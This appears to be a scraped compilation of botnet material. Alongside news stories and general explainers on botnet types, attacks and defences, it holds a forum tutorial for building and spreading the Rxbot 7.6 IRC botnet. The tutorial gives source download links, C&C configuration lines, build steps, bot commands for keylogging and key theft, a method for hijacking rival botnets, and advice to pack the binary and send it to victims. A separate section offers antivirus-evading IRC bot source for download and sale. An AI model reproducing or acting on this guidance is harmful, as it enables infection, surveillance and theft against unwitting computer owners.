Android Botnet Infects Over 1 Million Phones in China

A piece of mobile malware believed to be hidden in around 7,000 Android applications has infected the devices of over 1 million users from China. Experts say that this may be the largest Android botnet the country has ever seen.

According to Chinese publication Xinhua, the Trojan that powers the botnet is Android.Troj.mdk, a threat first discovered back in 2011.

Once it’s installed on a device, the Trojan allows its master to take complete control of it. The malicious element can be used to harvest messages, phone numbers, contact details, geo-location data and even media files.

Bitdefender experts note that the Trojan also downloads additional applications that slow down the phone’s performance, generate aggressive adware, and drain the device’s battery.

With over 420 million mobile users, China has become an important target for malware developers.

How to compile, secure, run botnets Tutorial

While searching on net i find this good tutorial :-P:-P

================================================== ===========

There are many tutorials around but I thought I would post one to help people.

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:

Code:

http://0c27970a.seriousfiles.com

Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.

But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !

Theres the infected computers "bots" the attacker, the server, and the victim.

Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.

---------------

Here we go ladies and gentlemen
Follow the tutorial:

I. Setting up the C++ compilier: (easy)
Download 

Code:

http://www.megaupload.com/?d=SUHPYZRX
http://rapidshare.com/files/21861555/msc__.rar.html

Code:

Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install the Service Pack 6 (60.8 mb)

Code:

http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en

After that Download and install:

Windows SDK (1.2 mb)

Code:

http://6dc2d950.seriousfiles.com
http://www.megaupload.com/?d=YH3SS78I
http://rapidshare.com/files/21854411/sdk.rar.html

Pass: itzforblitz

II. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)


(it does not matter whats below those lines)

III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)

Code:

http://824d8b3c.seriousfiles.com
http://www.mediafire.com/?awmwyidzjz5
http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:


5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

Command list
Download Command list

Code:

http://056c0507.seriousfiles.com

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
Download mIRC

Code:

http://39144cc5.seriousfiles.com

How to secure your bots:

Don't be an arse it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:
Quote:
@update 

Code:

http://www.mybot.com/download/SMSPRO.exe

82

The

Code:

http://mybot.com

is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:


This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.

Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

Hope it help

Credit : SkY 

IRC BOT SOURCE CODES (Written in C++, C# & PYTHON)

Lately I have found myself with a lot of  free time on my hands. My mom always said “THE DEVIL FIND WORK FOR IDLE HANDS”, so i decided to use this time to refresh my programming skills  mainly c++ and python.  During this time someone asked me if i knew of any good irc bots, my answer was “not really” because  they all get detected by antivirus software.

Thats when i got the idea to try and build a good irc bot which i did, I actually built three in three different languages. The one written in c++ got detected by most antivirus software (33 out of 40),  the one  written in c# doesn’t get detected if i remove the keylogger module which is still fairly good because it still as video recording, audio recording and screenshot capability. The one written in python is my “PICASO”  it only got detected by one antivirus (kaspersky) and it wasn’t detected as a virus,  it was detected for having a low reputation (WS.Reputation.1) which means it wasn’t well known as a legit software by the AV company. Kaspersky antivirus still allowed it to be installed  So that really wasn’t a problem.

http://darksidegeeks.com/irc-bot-source…des-c-c-python/

The only negative thing about writing an irc bot in python is the file size. Due to the fact that python is not a compiled language  like C++  or C,  even if the source code is only a few kilobytes the finish product will be a few megabytes because the interpreter is packaged as a dependency with the exe file. This could also be a good thing since most people are very suspicious of  very small files This also kills the need for a exe packer.

DOWNLOAD  C# SOURCE CODE: you only need to configure the “config.cs” file.

DOWNLOAD  PYTHON SOURCE CODE: you only need to configure the “config.py“ file.

NB: if you want a compiled version of the python irc bot its only $ 20 but the source code is completely free.

To see the python irc bot in action please watch the video below.

[youtube]http://www.youtube.com/watch?v=KwoV_d56uj4[/youtube]

[youtube]http://www.youtube.com/watch?v=WOEa7RSA60s[/youtube]

source: http://darksidegeeks.com

Botnets

---

A botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing amongst them.

Usually though, when people talk about botnets, they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed in a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.

A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers’ resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC)

There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.

Different Types of Bots

Here is a list of the most used bots in the internet today, their features and command set.

XtremBot, Agobot, Forbot, Phatbot

These are currently the best known bots with more than 500 versions in the internet today. The bot is written using C++ with cross platform capabilities as a compiler and GPL as the source code. These bots can range from the fairly simple to highly abstract module-based designs. Because of its modular approach, adding commands or scanners to increase its efficiency in taking advantage of vulnerabilities is fairly easy. It can use libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot

Like the previous type of bot, these bots are published under GPL, but unlike the above mentioned bots these bots are less abstract in design and written in rudimentary C compiler language. Although its implementation is less varied and its design less sohisticated, these type of bots are well known and widely used in the internet.

GT-Bots and mIRC based bots
These bots have many versions in the internet mainly because mIRC is one of the most used IRC client for windows. GT stands for global threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extensions .mrc.
Malicious Uses of Botnets

Types Of Botnet Attack

Denial of Service Attacks
A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through the loss of connectivity or consumption of the victim network’s bandwidth and overloading of the resources of the victim’s computer system. Botnet attacks are also used to damage or take down a competitor’s website.

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Any Internet service can be a target by botnets. This can be done through flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack in which higher level protocols are utilized to increase the effects of an attack is also termed as spidering.

Spyware Its a software which sends information to its creators about a user's activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example is the Aurora botnet.

AdwareIts exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spamming and Traffic Monitoring
A botnet can also be used to take advantage of an infected computer’s TCP/IP’s SOCKS proxy protocol for networking appications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.

Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim's phone number. Given enough bots partake in this attack, the victim is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

Keylogging and Mass Identity Theft
An encryption software within the victims’ units can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program in the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequence typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal accounts theft for the past several years.

Bots can also be used as agents for mass identity theft. It does this through phishing or pretending to be a legitimate company in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in the username and password.

Botnet Spread
Botnets can also be used to spread other botnets in the network. It does this by convincing the user to download after which the program is executed through FTP, HTTP or email.

Pay-Per-Click Systems Abuse
Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.  

source : http://www.hackersonlineclub.com/

Botnet Detail

Botnet

In malware, a Botnet is a collection of infected computers or bots that have been taken over by hackers (also known as bot herders) and are used to perform malicious tasks or functions. A computer becomes a bot when it downloads a file (e.g., an email attachment) that has bot software embedded in it. A Botnet is considered a Botnet if it is taking action on the client itself via IRC channels without the hackers having to log in to the client's computer. A Botnet consists of many threats contained in one. The typical Botnet consists of a bot server (usually an IRC server) and one or more botclients

Formation and exploitation

This example illustrates how a Botnet is created and used to send email spam.

1. A Botnet operator sends out viruses or worms, infecting ordinary users' computers, whose payload is a malicious application—the bot.
2. The bot on the infected PC logs into a particular C&C server (often an IRC server, but, in some cases a web server).
3. A spammer purchases the services of the Botnet from the operator.
4. The spammer provides the spam messages to the operator, who instructs the compromised machines via the IRC server, causing them to send out spam messages.

Botnets are exploited for various purposes, including denial-of-service attacks, creation or misuse of SMTP mail relays for spam (see Spambot), click fraud, spamdexing and the theft of application serial numbers, login IDs, and financial information such as credit card numbers.

The Botnet controller community features a constant and continuous struggle over who has the most bots, the highest overall bandwidth, and the most "high-quality" infected machines, like university, corporate, and even government machines.

Types of attacks

* Denial-of-service attacks where multiple systems autonomously access a single Internet system or service in a way that appears legitimate, but much more frequently than normal use and cause the system to become busy.

* Adware exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

* Spyware is software which sends information to its creators about a user's activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example is the Aurora Botnet.

* E-mail spam are e-mail messages disguised as messages from people, but are either advertising, annoying, or malicious in nature.

* Click fraud is the user's computer visiting websites without the user's awareness to create false web traffic for the purpose of personal or commercial gain.

* Access number replacements are where the Botnet operator replaces the access numbers of a group of dial-up bots to that of a Slave's phone number. Given enough bots partake in this attack, the Slave is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

* Fast flux is a DNS technique used by Botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.

Preventive measures

If a machine receives a denial-of-service attack from a Botnet, few choices exist. Given the general geographic dispersal of Botnets, it becomes difficult to identify a pattern of offending machines, and the sheer volume of IP addresses does not lend itself to the filtering of individual cases. Passive OS fingerprinting can identify attacks originating from aBotnet: network administrators can configure newer firewall equipment to take action on a Botnet attack by using information obtained from passive OS fingerprinting. The most serious preventive measures utilize rate-based intrusion prevention systems implemented with specialized hardware. A network based intrusion detection system (NIDS) will be an effective approach when detecting any activities approaching Botnet attacks. NIDS monitors a network, it sees protected hosts in terms of the external interfaces to the rest of the network, rather than as a single system, and get most of its results by network packet analysis.

Some Botnets use free DNS hosting services such as DynDns.org, No-IP.com, and Afraid.org to point a subdomain towards an IRC server that will harbor the bots. While these free DNS services do not themselves host attacks, they provide reference points (often hard-coded into the Botnet executable). Removing such services can cripple an entire Botnet. Recently, these companies have undertaken efforts to purge their domains of these subdomains. The Botnet community refers to such efforts as "nullrouting", because the DNS hosting services usually re-direct the offending subdomains to an inaccessible IP address. Similarly, some Botnets implement custom versions of well-known protocols. The implementation differences can be used for fingerprint-based detection of Botnets. For example, Mega-D features a slightly modified SMTP protocol implementation for testing the spam capability. Bringing down the Mega-D's SMTP server disables the entire pool of bots that rely upon the same SMTP server.

Several security companies such as Afferent Security Labs, Symantec, Trend Micro, FireEye, Umbra Data and Damballa have announced offerings to stop Botnets. While some, like Norton AntiBot (discontinued), are aimed at consumers, most are aimed to protect enterprises and/or ISPs. The host-based techniques use heuristics to try to identify bot behavior that has bypassed conventional anti-virus software. Network-based approaches tend to use the techniques described above; shutting down C&C servers, nullrouting DNS entries, or completely shutting down IRC servers.

Newer Botnets are almost entirely P2P, with command-and-control embedded into the Botnet itself. By being dynamically updateable and variable they can evade having any single point of failure. Commanders can be identified solely through secure keys and all data except the binary itself can be encrypted. For example a spyware program may encrypt all suspected passwords with a public key hard coded or distributed into the bot software. Only with the private key, which only the commander has, can the data that the bot has captured be read.

Newer Botnets have even been capable of detecting and reacting to attempts to figure out how they work. A large Botnet that can detect that it is being studied can even DDoS those studying it off the internet.

Few Description about Zombie Computer.

Zombie Computer :- A Zombie Computer (often shortened as Zombie) is a computer connected to the Internet that has been compromised by a cracker, computer virus or trojan horse and can be used to perform malicious tasks of one sort or another under remote direction. Botnet of Zombie Computers are often used to spread e-mail spam and launch denial-of-service attacks. Most owners of zombie computers are unaware that their system is being used in this way. Because the owner tends to be unaware, these computers are metaphorically compared to Zombie.  

source : http://www.worldofhacker.com/

Bot attacks Linux and Mac but can't lock down its booty

From the department of cosmic justice comes this gem, spotted by researchers from Symantec: a trojan that targets Windows, Mac, and Linux computers contains gaping security vulnerabilities that allow rival criminal gangs to commandeer the infected machines.

Known as Trojan.Jnanabot, or alternately as OSX/Koobface.A or trojan.osx.boonana.a, the bot made waves in October when researchers discovered its Java-based makeup allowed it to attack Mac and Linux machines, not just Windows PCs as is the case with most malware. Once installed, the trojan components are stored in an invisible folder and use strong encryption to keep communications private.

The bot can force its host to take instructions through internet relay chat, perform DDoS attacks, and post fraudulent messages to the victim's Facebook account, among other things.

Now, Symantec researchers have uncovered weaknesses in the bot's peer-to-peer functionality that allow rival criminals to remotely steal or plant files on the victim's hard drive. That means the unknown gang that took the trouble to spread the infection in the first place risks having their botnet stolen from under their noses.

“Even though it's encrypted and even though it was written in Java to make it cross-platform, it was still vulnerable to basically a directory transversal exploit,” Dean Turner, director of Symantec's Global Intelligence Network, said. “From a technical perspective, it goes to show that even if you have all those things where you're building in a secure platform, if you're not building application security into your malware, other bad guys will probably take advantage of it.”

Jnanabot's P2P feature is designed to make botnets harder to take down by providing multiple channels of communication. After sending an infected machine a single GET request, a website can discover all the information needed to upload any file to any location on the host's file system. Attackers can then install a simple backdoor on a user's machine by, for instance, writing a malicious program to a computer's startup directory.

Attackers can use the same vulnerability to steal files on infected machines.

Turner said the number of Jnanabot infections so far is “measured in the thousands,” rather than the hundreds of thousands for some of the better-known trojans. Still, infection statistics gathered by Symantec in December are surprising. They show that about 16 per cent of infections hit Macs. They didn't show any infections on Linux machines. Turner said that Jnanabot attacks on the open source platform weren't able to survive a reboot.

Source: Symantec

The bot was discovered spreading over Facebook posts that planted the following message on infected users' Facebook pages: “As you are on my friends list I thought I would let you know I have decided to end my life.” An included link leads recipients to a cross-platform JAR, or Java Archive file that can run on Windows, Mac, or Linux. Once the recipient is infected, his Facebook page carries the same dire warning.

It's not the first time that malware developers have built gaping vulnerabilities into their wares. In September, researcher Billy Rios disclosed a weakness in the Zeus crimeware kit that makes it easy to take over huge networks of infected PCs.

Symantec has more about the trojan here, here, and here.